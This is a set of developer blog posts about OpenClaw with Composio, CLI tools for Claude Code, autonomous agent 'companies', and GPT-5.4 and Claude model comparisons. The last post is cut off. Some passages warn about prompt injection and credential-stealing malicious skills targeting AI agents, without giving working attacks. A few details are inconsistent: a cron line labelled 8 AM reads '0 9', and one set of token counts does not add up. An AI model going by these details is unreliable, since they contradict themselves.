The bot requires per-user OpenClaw instances assigned by an admin. If a user hasn't been assigned an instance, they can't use any features. /connect, /connections and chat all require an assignment first.

Why not use shared instance?

By shared instance, I mean all the users share the same OpenClaw instance. So why not use it that way? That's how server is supposed to work?

There's a few reasons:

By default, OpenClaw is not designed to support multiple users connecting to the same gateway concurrently. In practice, which is likely to be the case for our use case.

This is already the main reason.

Also, in general, letting multiple users use the same instance with multiple connected accounts is not safe. A prompt injection by one user could access or destroy another user's data.

Even if there's safety measure (which I'm not aware of). Things could always go wrong. So better safe than sorry.

// 👇 lib/config.ts

export async function getUserOpenClawConfig(
  slackUserId: string,
  slackTeamId: string,
): Promise<OpenClawConfig> {
  const user = await db.slackUser.findUnique({
    where: { slackUserId_slackTeamId: { slackUserId, slackTeamId } },
    select: { openclawGatewayUrl: true, gatewayToken: true },
  });

  if (user?.openclawGatewayUrl && user?.gatewayToken) {
    return {
      gatewayUrl: user.openclawGatewayUrl,
      gatewayToken: user.gatewayToken,
    };
  }

  throw new Error(
    "No OpenClaw instance assigned. Ask your admin to run /assign.",
  );
}

No assignment, no access. The admin runs /assign for each user, providing their OpenClaw gateway URL, token, and MCP Config. Until that happens, the bot won't respond to that user.

Configure OpenClaw with Composio

Great, now the code part is done. There's one thing that's still left.

Now, the actual reason to build the bot i.e. to get tools access is not configured within OpenClaw which we do with Composio. It's the most easiest.

There's multiple ways to configure OpenClaw with Composio. There's standard ways you can find here.

But, we won't follow the standard way, as by default it uses consumer key, which is a way it's designed by default.

But we won't work with consumer key, we directly work with the MCP URL.

Go ahead and modify the OpenClaw config file which lives in the ~/.openclaw/openclaw.json with the following:

// rest of the config...

  "plugins": {
    "allow": [ "composio", "...rest"],
    "entries": {
      "telegram": {
        "enabled": true
      },
      "composio": {
        "enabled": true,
        "config": {
          "enabled": true,
          // put the MCP URL you receive after running /assign for a user.
          "mcpUrl": "..."
        }
      }
    },
  }

This sets up one instance for one user. But how do you about configuring multiple instances for multiple users?

How do you run it for multiple users?

This only configures one user in the entire workspace. But what about the rest?

There are a few ways:

1. Separate machine or VMs:

Each user's OpenClaw runs on a different machine. Each has its own ~/.openclaw/openclaw.json with its own MCP URL. This is the cleanest but most expensive.

2. Use named OpenClaw profiles:

OpenClaw ships with a --profile flag out of the box:

  --profile <name>     Use a named profile (isolates OPENCLAW_STATE_DIR/OPENCLAW_CONFIG_PATH under ~/.openclaw-<name>)

You can use a different profile per user. If you name each profile after the user, you get an isolated config for each one on the same machine. Most efficient.

For example:

openclaw --profile bob
openclaw --profile shrijal

3. Separate OS users on one machine:

Somewhat impractical. You'd run one OpenClaw instance per OS user, which means creating a separate system account for each person. Possible, but not a great approach.

There could be hundreds of other ways to do it. These are just the ones I could think of. Do your own research, and you’ll probably find others.

Slack Workflow

Run these commands in order as an admin before any user can start chatting.

/add-mcp-config

/add-auth-config

Assign each user their OpenClaw instance and MCP Config:

/assign

This gives you the user's scoped MCP URL. Configure it in their OpenClaw instance.

Once assigned, users run:

/connect <toolkit>

That's it. After connecting, they can DM the bot or @mention it in a channel.

Bot in Action

Here's a quick demo of the bot in action:

Conclusion

So yeah, that's the whole idea.

A Slack bot on top of OpenClaw, with Composio handling user tool connections, ends up being a really solid setup.

At this point, you’ve got a good idea of how this bot works with Slack, OpenClaw, and Composio.

We covered the main flow, how users connect their tools, how everything comes together inside Slack, and why assigning one OpenClaw instance per user helps keep things isolated.

It keeps the setup clean and gives you a bot that’s actually useful.

That's all for this one.

You can find the entire source code here: shricodev/saas-openclaw-slackbot

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration

Top 10 CLI Tools to Level-Up Claude Code

Shrijal Acharya — Mon, 06 Apr 2026 12:51:40 +0000

I've been using Claude Code more than any other AI agents recently.

And when it's the tool you use the most, it just makes sense to make that workflow as productive as possible.

A lot of the experience comes down to the small tools around it. The ones that help you search, navigate, review diffs, watch system usage, or just keep your workflow clean.

So this post is a simple list of the CLI tools I think pair really nicely with Claude Code.

There's an awesome repo with a curated collection of CLI tools for coding agents: awesome-agent-clis

What does "tools for Claude Code" actually mean?

Claude Code is already powerful on its own.

But it gets even better when you pair it with the right terminal tools, especially since you’re already working in the terminal.

I’m not talking about tools built specifically for Claude Code.

I mean the CLI tools that make the overall workflow smoother, faster, and easier to manage while Claude is working in your repo.

1. GitHub CLI

ℹ️ GitHub’s official CLI for working from the terminal.

What it is?

GitHub CLI is basically running GitHub from your terminal. You can create repos, check issues, review PRs, manage branches, and handle a bunch of GitHub workflow stuff without leaving your shell.

It can be as simple as:

gh repo create

for creating a new repository through an interactive prompt, which is one I use the most. And there are tons of other commands you can use.

Find all the others in the help window.

gh --help

Why use it with Claude Code?

This one probably will not be for everyone.

A lot of people do not want to give Claude access to their GitHub repos, and that is totally fair. But if you are comfortable with it, I honestly think it is one of the best tools to pair with Claude Code.

Or even if you do not want Claude directly using it, GitHub CLI is still great to have beside Claude Code since you can just run the commands yourself and keep moving without leaving the terminal.

2. Composio

ℹ️ An MCP server that connects Claude Code to hundreds of external apps.

What it is?

Composio is an MCP server you can add to Claude Code so it can work with 500+ apps.

You can find the guide on how to connect Composio with Claude Code here: Composio Universal CLI

Why use it with Claude Code?

The main way I use Composio with Claude Code is for email.

Say I am working on something and need to send a mail to someone.

Without this, I would usually have to stop, open my mail client, write the message, double check it, and send it myself.

With Composio set up inside Claude Code, I can just ask Claude to draft the email, or give it the content and the recipient, and it can handle the rest for me.

And maybe most importantly, no more spelling mistakes in your emails. 😃

That is the workflow I use the most.

Since you have 500+ app access, you can already imagine how many other things you could automate from there.

They recently added CLI support as well, which you can install here: Composio CLI

For development, Composio provides a playground with test users, execution logs, and real-time trigger streaming so you can iterate on agent behaviour locally before going to production.

3. ripgrep

ℹ️ The fastest way to search through a codebase from the terminal.

What it is?

It is a ridiculously fast search tool for the terminal.

It lets you search through files, code, and folders almost instantly.

If you have ever used grep, which I assume you have, it's a complete and faster replacement for that in real world repos.

A simple example:

rg "useEffect"

That will search for useEffect across your entire project and show you where it appears.

Why use it with Claude Code?

This is one of the first tools I'd install.

When working on a real world repo, you are constantly searching for things. Function names, config, and whatnot.

ripgrep basically makes that fast.

Even Claude Code defaults to using this tool when searching for things in its workflow. Overall, it is just super handy to have a quick way to move around the repo yourself without digging around manually.

4. tmux

ℹ️ A better way to manage terminal sessions.

What it is?

tmux lets you run multiple terminal sessions inside one terminal.

You can split panes, open multiple windows, switch between them quickly, and keep everything organized without opening a bunch of separate terminal tabs.

It might feel a little unnecessary at first. But once you get used to it, there is no way back.

Why use it with Claude Code?

For me, tmux is one of the most useful tools to pair with Claude Code, and it is actually what is running in my terminal right now as I work on this blog inside Neovim. 👀

I usually have Claude in a pane, with Neovim or a server running in one window, Lazygit in another, and then some extra panes for running commands.

If you use Neovim, it gets even better. You can have Claude open in one split and Neovim in another. As Claude makes changes, if you need to edit something, Neovim is right there. And for diffs or Git work, Lazygit is sitting in another window.

How cool is that?

You are not constantly jumping between tabs or losing track of what is running where.

5. FFmpeg

ℹ️ The go-to CLI tool for handling just about any media file.

What it is?

Honestly, this is one of the best tools I have added to my workflow recently.

FFmpeg is a command line tool for working with media files. You can use it to convert images from one format to another, like PNG to JPG, convert video formats, compress files, trim audio, and do all sorts of file processing.

It supports basically every format you can think of.

As developers, we end up doing this kind of stuff all the time. And having one tool that handles all of it from the terminal is just super handy.

💡 FUN FACT: Almost all the online media tools that you use on the internet, like online video compressors and similar stuff, are powered by FFmpeg under the hood.

Once you have it in your terminal, you really don't need to ever visit such sites.

Why use it with Claude Code?

The only catch is that FFmpeg commands are a little complex.

Even for a simple task, the syntax is just a little too much to understand.

Here's a quick command to crop a video file:

ffmpeg -i input.mp4 -vf "crop=1280:720:0:0" -c:a copy output.mp4

That is exactly where Claude Code becomes useful.

You can just describe what you want in plain English, and let Claude generate the right FFmpeg command for you.

6. Lazygit

ℹ️ A simple TUI for Git

What it is?

Lazygit is a terminal UI for Git.

It gives you a much nicer way to handle things like commits, branches, stashing, rebasing, and reviewing changes without typing every Git command manually.

You still stay in the terminal.

It just makes the whole Git workflow super easy, and you do not need to remember and type out any commands. Just knowing the concepts is enough.

Why use it with Claude Code?

This is one I always have open beside Claude Code.

When Claude makes a lot of changes in a bunch of files, Lazygit makes it easier to review everything, stage only what you want, and manage the overall Git workflow.

I usually keep Lazygit open in every session inside tmux, in its own window, so I can quickly jump there and handle Git stuff whenever I need to.

I will talk about tmux a bit later in the list, but this combo works really well.

7. btop

ℹ️ A much better way to monitor your system

What it is?

btop is a system monitor for the terminal.

It gives you a clean view of CPU, memory, disk, network, and running processes, all in one place.

There is also htop, which a lot of people already know and use. But personally, I prefer btop.

It just feels a bit more user friendly, and overall nicer and easier to filter down processes.

Why use it with Claude Code?

When you are doing a lot inside the terminal, especially with bigger repos, it is really useful to keep an eye on system usage.

That might be Claude, any processes it launches with your permission, local servers, or anything else running in the background.

btop gives you a quick way to see what is eating memory, what is using CPU, and whether your machine is starting to struggle, especially when you're using local models.

8. fzf

ℹ️ The backbone of fuzzy finding in the terminal

What it is?

I have probably been using this tool longer than any other in this list.

fzf is a command line fuzzy finder.

It lets you search and pick things interactively from the terminal.

That could be files, directories, Git branches, command history, processes, or really anything you can pipe into it.

If you haven't heard about this tool or have never used it, you are doing something wrong 😏.

A simple example:

find . -type f | fzf

This gives you a fuzzy searchable list of files in the current directory.

Why use it with Claude Code?

This is one of those tools that just makes terminal workflows feel faster.

Whether I am jumping between files, searching through something, or picking from a long list of options, fzf is usually involved somewhere. I have so many scripts built around fzf.

And when you are already spending a lot of time in the terminal with Claude Code, that kind of speed matters.

It is not really a Claude specific tool. It is one of the foundations that make working in the terminal and overall moving between things a lot better.

9. (Optional) LLMFit

ℹ️ Handy if you are experimenting with local or custom models alongside Claude Code.

What it is?

LLMFit is a CLI tool that scans your system hardware and tells you which local AI models you can run smoothly on your system.

If you are planning to run a local model, it is a nice way to avoid downloading something that your system will struggle with. Its whole purpose is to help match models to the machine you have.

Installing is as simple as:

pip install llmfit

Now, to scan your hardware against models, run this:

llmfit scan

and it will list out all the models with their metadata and performance scores based on your hardware.

Why use it with Claude Code?

This one is definitely more niche.

But if you are running Claude Code with a local or custom model setup, it can help you figure out what will run well on your machine before you waste time downloading the wrong model.

It is not something everyone will need, but for people who prefer the Claude Code agent and want to test newer local or custom models from other providers, this is an option as well.

You can find many guides on doing that. One that I referenced while trying it out is by Luong NGUYEN.

A few more nice ones

There are also a few other terminal tools I use a lot that I did not want to give a full section to, but they are still very much part of the overall workflow.

Things like fd, zoxide, eza, yazi, and bat all make the terminal feel nicer to work in.

Some help you move around directories faster. Some make listing files, previewing content, or moving around in the filesystem way better than the default.

I leave it up to you to research these tools.

None of these are Claude Code specific.

Ones I'd install first

If I had to set this up again from scratch, I’d probably start with ripgrep, GitHub CLI, tmux, and Lazygit.

That already covers a lot of the core workflow around Claude Code.

And separately, I’d also set up Composio.

It’s a bit different from the rest here. It’s not exactly just another CLI tool, but more of an MCP server. Really useful if you want to automate parts of your workflow and connect Claude to external tools in a cleaner way.

Final thoughts

You definitely do not need every tool in this list.

But a few of them can make working with Claude Code a lot smoother, especially once you start using it more seriously.

At the end of the day, it’s really just about making the workflow around Claude feel cleaner and easier to manage.

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration

🚀 How to run a fully-autonomous company with OpenClaw 🦞

Shrijal Acharya — Thu, 02 Apr 2026 14:39:22 +0000

Imagine owning a company with just one human employee, and that too is yourself. The rest? All OpenClaw agents!

Before OpenClaw, that would have sounded completely silly, but with it, it's possible, really possible!

You can automate your entire company or simulate a fully functioning one with just OpenClaw and your VPS, Mac Mini, or local system for testing.

TL;DR

In this tutorial, you'll learn how to run an entire company using just yourself and a bunch of OpenClaw agents.

What you will learn: ✨

What OpenClaw is and how it works
Why storing API keys locally is a bad idea
Setting up Composio for secure OAuth-based integrations
Connecting your first app and getting agents up and running 🚀

Ready to become a one-person company? 👀

What's OpenClaw?

💁 I assume you already know what OpenClaw is. If not, why are you even here? Just kidding... The blog itself is completely beginner friendly. If you already have an idea of what OpenClaw is, just skip this section.

OpenClaw is a personal AI assistant you run on your own machine or a server you own. It is the thing that actually sits between your model provider (OpenAI, Anthropic, Kimi, etc.) and the stuff you want done, such as messaging, tools, files, and integrations, and this idea is what actually makes the one-person company possible.

Take this as a mental model:

Your LLM is the brain (thinks)
OpenClaw is the body (it can do things)
The Gateway is the receptionist (routes messages in and results out)

It provides the model with a runtime that can call tools, maintain state, and appear where you already chat (WhatsApp, Telegram, Slack, Discord, etc.). Now, that's just the gist. There's much more to understand. I assume you've already worked with it, so I'm not going any deeper than this in the intro.

For installation, visit the OpenClaw installation guide, and based on your distro and installation choice, install it on your machine.

If you just want it running quickly, do the normal installation. If you're even slightly paranoid (which you should be 😮‍💨), use Docker.

Also, make sure you set up a channel for easier chatting from your phone (preferably Telegram).

For help setting up a channel, ask OpenClaw itself. It knows itself better than anyone else on the internet.

💁 If you face issues like OpenClaw: access not configured when talking with the bot, make sure you run this command:

openclaw pairing approve <telegram/whatsapp/...> <pairing_code>

Just like that, now you have an agent listening on your channel. Message anything, and you should get a reply back.

From here onwards, I assume you already have OpenClaw running. To make sure everything is working, run this command:

openclaw health

If not, try running openclaw doctor, which helps debug your gateway or channel issues.

Run a whole company?

Yeah, in theory, you can actually automate or run an entire company. Can't guarantee the company will stand long, but with OpenClaw, it's now possible.

The only human in the process is going to be yourself. All your employees will be OpenClaw Agents.

As you can see, most day-to-day operations of running a company, such as sales, team meetings, and customer care, can be managed with OpenClaw Agents. And there are many more than just the ones in the image, of course. This is just a quick sketch to give you an idea.

Problem with "Just OpenClaw"

By default, OpenClaw works with API keys, and it stores them in a plain text file in the ~/.openclaw/ directory for all the services you use, such as Google, Gmail, and so on. This is not a very good practice if you're running this on your local machine. If using something like a VPS or the hyped Mac Mini, it's fine, but still, storing credentials in a local plain text file is never a good idea.

Especially if you're using smaller models, they are even more prone to prompt injections, and since OpenClaw has whole system access, it might wipe out your entire system without you doing anything.

What's actually gone wrong in the wild (already):

Malicious skills on ClawHub: researchers found hundreds to thousands of skills that were straight-up malware or had critical issues, including credential theft and prompt injection patterns.

Prompt injection turning into installs: there's been at least one high-profile incident where a prompt injection was used to push OpenClaw onto machines via an agent workflow.

For the above reasons, I recommend that you use some hosted service which in my case, Composio. It lets you authenticate using OAuth, which is the most secure option over pasting keys locally.

Connecting your first app

Now, it's time to create agents, but first, we need to set up or connect our first app from Composio.

The agents will mostly revolve around working with those applications from Composio.

1. Install Composio Plugin

Composio's OpenClaw plugin connects OpenClaw to Composio's MCP endpoint and exposes third-party tools (GitHub, Gmail, Slack, Notion, etc.) through that layer.

openclaw plugins install @composio/openclaw-plugin

2. Composio Plugin Setup

Log in at dashboard.composio.dev
Choose OpenClaw as the client.
Copy your consumer key (ck_...) from the Composio dashboard settings, then set it:

openclaw config set plugins.entries.composio.config.consumerKey "ck_your_key_here"

Now, it's a good idea to restart the gateway:

openclaw gateway restart

3. Verify the plugin loaded

openclaw plugins list
openclaw logs --follow

You're looking for something like "Composio loaded" and a "tools registered" message.

If the plugin is "loaded", it means you can now successfully access Composio.

Here's how it works:

The plugin connects to Composio's MCP server at https://connect.composio.dev/mcp and registers all available tools directly into the OpenClaw agent. Tools are called by name — no extra search or execute steps needed.

If a tool returns an auth error, the agent will prompt you to connect that toolkit at dashboard.composio.dev.

Here's how the configuration looks:

{
  "plugins": {
    "entries": {
      "composio": {
        "enabled": true,
        "config": {
          "consumerKey": "ck_your_key_here"
        }
      }
    }
  }
}

You can configure the following options directly from the config file:

enabled: enable or disable the plugin
consumerKey: your Composio consumer key
mcpUrl: the MCP server URL. By default, it's https://connect.composio.dev/mcp

Previously, you had to configure API keys per integration, but with Composio you don't have to worry about any of that. Just make sure not to leak the consumer key that we generated.

And it's that simple. Everything works out of the box just as you would use any other OpenClaw plugin!

Now, to test if it works, head over to the Control UI chat and send a message, something like:

"List the Composio tools you have available."

If it asks you to connect the tools, head over to dashboard.composio.dev and connect each of the tools you require. It's as simple as clicking Connect.

All the integrations you use are OAuth-hosted, and only the tools you connect will be available to OpenClaw. Nothing more than that.

Setting up a Multi-Agent Team

The idea is pretty clear. Since one single agent wouldn't be enough to handle all sorts of company requirements due to context window limitations, you could have multiple sub-agents for multiple task types.

Say, one agent AgentA handles marketing, AgentB handles business analysis, AgentC handles something else.

Each agent has a distinct role, personality, and model optimized for its use case — say, for business analysis, you'd want a more research-oriented model like GPT-5.2.

And how do you create them? It's simple, just chat with OpenClaw itself, either in the chat window or your configured channel.

Example:

Please create a new agent called **Shri**. This agent should be capable of handling tasks such as reading and composing emails, and scheduling Google Meet sessions.

For the model, use **Claude Sonnet 4.6** (`claude-sonnet-4-6`).

Please ensure that the existing main agent remains untouched and unchanged.

And it will create a new agent, which you can view in the Agents tab in the OpenClaw dashboard or by running /agents in the OpenClaw TUI.

Similarly, do it for all your different work types. Create a separate agent for each type of work.

The main agent can then delegate work to those specialized agents, each handling one specific task type, which improves response quality because one agent is handling one type of work instead of everything at once.

💡 TIP: This also helps you reduce model usage costs, as you can assign more reasoning-heavy models to complex tasks and smaller, cheaper models to simpler ones.

What's Missing?

Everything seems good, but there's one thing missing... autonomy.

You still have to message OpenClaw manually to get things done, which isn't ideal when you're planning on using it as an AI employee.

There are two ways to achieve this:

1. If you're a little technical

You must be familiar with cron jobs and their syntax. If so, this is a way to do it directly from the CLI outside of OpenClaw.

Run the following command:

openclaw cron add --schedule "<cron_syntax>" --message "<prompt>"

Say you want it running every single day at 8 AM:

openclaw cron add --schedule "0 9 * * *" --message "<prompt>"

2. If you're not technical

Similar to how we used a prompt to create a new agent, all you need to do is write a prompt:

Every morning at 9 AM, send me the top news of the day. Also scan my Google Calendar for the day, identify each attendee and their company. Send me two different messages on Telegram: one with the news summary and one with the meeting details.

Use the relevant Agent you have for each purpose.

💁 There's also a similar concept called Heartbeat, which is another approach for scheduling tasks in OpenClaw. You can check it out here: OpenClaw Heartbeat

Workflow Demo

Okay, time for a demo.

Showing an entire workflow demo of running a company would be too much work, so for this demo, I will show you one part of the workflow: checking the calendar and messaging a summary with attendees every day at a set time.

You could have it run every X hours or every single day at a fixed time. After each interval, the model will do as said above (Obviously, the idea is too naive, but it's just for this demo.) The possibilities are endless.

Keep this in mind: “anything that you can do manually on the internet, you can automate with OpenClaw.” So, you get the idea.

💁 NOTE: If you're serious about this idea, it's better to run this on a VPS or a Mac Mini, because you mostly don't have your personal PC running 24/7.

Here's the demo:

Conclusion

So far, you've learned how to run a fully functioning company with just yourself and a bunch of OpenClaw agents, using Composio as the secure integration layer between OpenClaw and all your third-party apps.

Be sure to give a star to Composio and OpenClaw on their GitHub repositories.

If you found this article helpful, drop a like and share your thoughts in the comments below. 👇

Happy automating! 🥳

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration

Everything you need to know about OpenAI GPT-5.4 ✌️

Shrijal Acharya — Sat, 21 Mar 2026 14:08:05 +0000

OpenAI’s new GPT-5.4 is here, and on paper at least, it looks like one of their strongest all-rounder models so far.

TL;DR

In this article, we take a quick look at OpenAI GPT-5.4, go through its official benchmarks, and then compare it in one small coding task against Anthropic’s general-purpose model, Claude Sonnet 4.6, to see how it actually performs.

We briefly go over what GPT-5.4 is, what OpenAI is claiming with this model, and why it looks like one of their strongest all-rounder releases so far.

We look at the official benchmarks around coding, reasoning, tool use, and computer-use capabilities to get an idea of how strong the model looks on paper.

Instead of relying only on benchmarks, we also compare GPT-5.4 against Claude Sonnet 4.6 in one small, quick coding task (not enough to judge fully, but still...).

Brief on OpenAI GPT-5.4

So, before we jump into the coding test, let me give you a quick brief on GPT-5.4, because this is one of OpenAI’s biggest model releases in a while.

OpenAI released GPT-5.4 on March 5, 2026, and they are positioning it as their most capable and efficient frontier model for professional work.

What makes this model interesting is that OpenAI is not selling it as just a coding model, and not just a reasoning model either. They are basically pitching it as an all-round professional work model that combines strong reasoning, strong coding, better tool use, and much better performance on practical work like spreadsheets, presentations, etc.

Honestly, this part matters more than it sounds. A lot of real AI work is not just prompting or writing code, it is dealing with PDFs, spreadsheets, slides, and all kinds of unstructured data. That is also where something like Tensorlake makes sense, because it helps turn that mess into something models can actually work with.

And the specs are also pretty wild. GPT-5.4 supports a 1.05M token context window with 128K max output tokens, which is pretty good room to work with. All in all, this helps the model remember things better. Also, a thing to note is that the knowledge cutoff for this model is August 31, 2025.

Now, let's talk about the part we mostly care about.

On the official OpenAI benchmarks, GPT-5.4 scores 57.7% on SWE-Bench Pro (Public), which puts it basically side by side with GPT-5.3-Codex, a coding-focused model, at 56.8%. So yes, OpenAI says this general-purpose model is slightly better than GPT-5.3-Codex, a coding-focused model, which I personally have not had the best experience with compared to Claude models, and that is kind of wild to think about.

OpenAI says GPT-5.4 is their first general-purpose model with native computer-use capabilities, which is a pretty big deal. That means it is built not just to generate text or code, but also to operate across software, work from screenshots, and handle more agent-like workflows. On OSWorld-Verified, it scores 75.0%, which OpenAI says is above human performance on that benchmark. 🤯

One thing I also like here is that OpenAI is claiming GPT-5.4 is their most factual model yet. It is said to be 18% less likely to contain any errors compared to GPT-5.2.

For API developers, pricing matters, of course.

The standard GPT-5.4 model is listed at $2.50 per 1M input tokens, $0.25 cached input, and $15 per 1M output tokens. GPT-5.4 Pro is way more expensive at $30 input and $180 output per 1M tokens, and OpenAI says it can take several minutes on hard tasks, so that one is clearly for cases where you really want the best answer and are okay paying for it.

💁 The normal GPT-5.4 model is probably the one most people will actually care about day to day, and that's what I'd prefer.

And as always, benchmarks are benchmarks. But on paper at least, GPT-5.4 looks like one of the strongest all-rounder models OpenAI has shipped so far.

Quick Coding Test

As this is a general-purpose model instead of a coding-tuned model, comparing the model's ability solely on coding is just not fair. But as developers, we mostly care about how good the model is at coding anyway, so just to give you an idea of how this model performs, we will do a quick test.

As you can see, there's not much difference in SWE-Bench between GPT-5.4 and GPT-5.3-Codex:

GPT-5.4: Latency (s): 1,053, Accuracy: 57.7%, Effort: xhigh
GPT-5.3-Codex: Latency (s): 1,114, Accuracy: 57.2%, Effort: xhigh

But to give you an idea of what to expect from this model in coding, I will run one small, quick test.

Let's take two general models, one from Anthropic, Claude Sonnet 4.6, and one from OpenAI, GPT-5.4, not pro, and compare them against each other to show the difference in their coding skills.

For the test, we will use the following CLI coding agents:

Claude Sonnet 4.6: Claude Code (Anthropic’s terminal-based agentic coding tool)
OpenAI GPT-5.4: Codex CLI

As GPT-5.4 is said to be strong in frontend, why not test it on frontend itself?

Test: Figma Design Clone with MCP

In this test, we'll be comparing both models on a Figma design, a complex dashboard with so many things happening in the UI.

Here's the Figma design that I'll ask both models to clone:

Prompt:

Build a **pixel-accurate clone** of the attached Figma design frame using the **provided Next.js project** as the starting point. Do **not** create a new project. Instead, implement the UI inside the existing codebase.

https://www.figma.com/design/8quNKljV0spv67VAGsA75D/Dashboard-Design-Concept--Community---Copy-?node-id=69-123&t=Tvu2UB7UDMqkvPRb-4

Please match the design as closely as possible, with close attention to layout, spacing, alignment, typography, colors, borders, shadows, corner radius, and overall visual balance.

Requirements:

* use the existing **Next.js** setup
* keep the code clean and componentized
* make the page responsive without changing the intended design
* use semantic HTML where appropriate
* avoid adding your own design decisions unless necessary
* if any part of the design is unclear, make the most reasonable choice and stay visually consistent

Prioritize **design accuracy first**, then code quality.

GPT-5.4

GPT-5.4 pretty much one-shotted the entire implementation in one go, which was honestly nice to see. It did not need any follow-up prompt, no fixing, nothing. It just took the Figma frame through MCP and started building the whole thing right away.

The final result actually looked decent. I would not call it pixel-perfect by any means, but compared to Claude Sonnet 4.6, I’d say the implementation looked noticeably better overall. The whole thing feels more like a static picture of the design than an interface you can actually interact with.

Time-wise, it took roughly 5 minutes to get to a working to the working build.

Here’s the demo:

You can find the code it generated here: GPT-5.4 Code

Token usage looked like this:

Total Token Usage: 166,501
Input Token Usage: 151,595
Cached Input Tokens: 1,291,776
Output Token Usage: 14,906
Reasoning Tokens: 1,479

And the following code changes:

Code Changes: 3 files changed, 803 insertions(+), 82 deletions(-)

To be honest, I still would not say this is the kind of code implementation you can just ship straight to production and call it done. But for a one-shot frontend clone from a Figma frame, this was a pretty solid attempt.

Claude Sonnet 4.6

Claude Sonnet 4.6 went straight into the implementation right away. It did run into an issue at first, not really a build error, but more of one of those annoying Next.js image gotchas:

After that, I gave it a quick follow-up prompt, and almost instantly, it fixed the issue and came back with a decent implementation.

As you’d expect, it did manage to clone the project structure and get the UI in place. And again, the same issue, there's just no functionality whatsoever. It just feels like a picture with no interactivity.

Here’s the demo:

You can find the code it generated here: Claude Sonnet 4.6 Code

Time-wise, it took 9 minutes 56 seconds to get to a working result, and the follow-up fix was pretty much instant.

Token usage, based on Claude Code’s model stats, looked like this:

Input Token Usage: 84
Output Token Usage: 35.4K

And the following code changes:

Code Changes: 10 files changed, 1017 insertions(+), 84 deletions(-)

To be honest, I’m not really impressed, but I’m not disappointed either. The result feels pretty neutral overall. It was able to use tools, get fairly close to the UI, and produce something usable for comparison, but the implementation itself feels a bit weird and not all that convincing.

Conclusion

So, after all the benchmarks, claims, and hype, I think the fairest takeaway is this: GPT-5.4 looks very strong on paper, and for a lot of people it works and is an upgrade, but it still doesn’t seem like it is the best model you can get for coding.

So yeah, I’d say GPT-5.4 is probably one of the strongest all-rounder models OpenAI has shipped so far, but whether it beats Claude, be it Sonnet or Opus, for coding in real usage is still something you’ll want to judge from your actual hands-on testing, not just benchmarks.

And honestly, that’s the real takeaway here anyway.

These models keep getting better at a speed that is honestly hard to keep up with. So rather than getting too stuck on who won one benchmark, the better thing to do is probably to keep building, keep testing, and keep learning how to use these models better for your use case.

What do you think, is GPT-5.4 actually that good, or is Claude still your go-to? 👇

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration

🔥Claude Opus 4.6 vs. Sonnet 4.6 Coding Comparison ✅

Shrijal Acharya — Thu, 05 Mar 2026 14:04:59 +0000

Anthropic recently dropped the updated Claude 4.6 lineup, and as usual, the two names everyone cares about are Opus 4.6 and Sonnet 4.6.

Opus is the expensive “best possible” model, and Sonnet is the cheaper, more general one that a lot of people actually use day to day. So I wanted to see what the real gap looks like when you ask both to build something serious, not a toy demo.

Benchmark-wise, there’s a difference of course, but it doesn’t look that huge when it comes to SWE and agentic coding.

I kept it super basic: one test (but a big one), same prompt, same workflow. I just compared how close they got without me stepping in.

⚠️ NOTE: Don’t take the result of this test as a hard rule. This is just one real-world coding task, run in my setup, to give you a feel for how these two models performed for me.

TL;DR

If you just want the takeaway, here’s the deal with these models:

First, Opus 4.6 is the peak for coding right now. At the time of writing, it’s basically the OG, and nothing else comes that close.

Claude Opus 4.6 had a cleaner run. It hit a test failure too, but fixed it fast, shipped a working CLI + Tensorlake integration, and did it with way fewer tokens. Rough API-equivalent cost (output only) came out around ~$1.00, which is kind of wild for how big the project is.
Claude Sonnet 4.6 Surprisingly close for a cheaper, more general model. It built most of the project and the CLI was mostly fine, but it ran into the same issue as Opus and couldn’t fully recover. Even after an attempted fix, Tensorlake integration still didn’t work. Output-only cost was about ~$0.87, but it used way more time and tokens overall to get there.

💡 Obviously, this isn’t a test to “compare” the two head-to-head. It’s just to see the difference in code quality. In general, there’s never really been a fair comparison between Opus and Sonnet since their very first launch, Opus has always been on another level.

Test Workflow

ℹ️ NOTE: Before we start this test, I just want to clarify one thing. I'm not doing this test to compare whether Sonnet 4.6 is better than Opus 4.6 for coding, because obviously Opus 4.6 is a lot better. This is to give you an idea of how well Opus 4.6 performs compared to Sonnet.

For the test, we will use everyone's favorite CLI coding agent, Claude Code.

As both models are from Anthropic, it works best for both and is not biased toward either.

We will test both models on one decently complex task:

Task: Build a complete Tensorlake project in Python called research_pack, a “Deep Research Pack” generator that turns a topic into:
a citation-backed Markdown report, and
a machine-readable source library JSON with extracted text, metadata, summaries, you get the idea.

It also has to ship a nice CLI called research-pack with commands like:

research-pack run "<topic>"
research-pack status <run_id>
research-pack open <run_id>

We’ll compare the overall feel, code quality, token usage, cost, and time to complete the build.

💡 NOTE: Just like my previous tests, I’ll share each model’s changes as a .patch file so you can reproduce the exact result locally with git apply <file.patch>.

Why Tensorlake?

Tensorlake is a solid choice for this Opus 4.6 vs Sonnet 4.6 test because it is a real platform with enough complexity to quickly show whether a model can actually build something end to end. It has an agent runtime with durable execution, sandboxed code execution, and built in observability, so the test is not just writing a few functions, it is wiring up a production workflow.

And selfishly, it is also a good dogfood moment. 👀 If a model can spin up a Tensorlake project from scratch and get it working, that is a pretty strong sign for two things: these recent models are getting scary good and how usable Tensorlake is for building serious agent style pipelines.

Coding Tests

Test: Deep Research Agent

For this test, both models had to build the research_pack Tensorlake project in Python. The goal was simple: give it a topic, it crawls stuff, figures out sources, improves them, and spits out:

report.md with [S1] style citations
library.json with the full source library
a clean CLI: research-pack run/status/open
plus Tensorlake deploy support so you can trigger it as an app, not just locally

You can find the prompt I’ve used here: Research Agent Prompt

One thing that went a bit crazy is that both models ran into basically the exact same/similar issue during the run.

That shows how similarly these models can behave, which is kind of creepy. If you give them the exact same task and constraints, they’ll often make similar choices. I wanted to call that out because you might’ve noticed the same pattern too.

Not surprisingly, Opus fixed it much faster and with way fewer tokens. Sonnet took longer, burned a lot more context trying to debug it, and even after the fix pass, it still didn’t fully work.

Claude Opus 4.6

Opus was pretty straightforward.

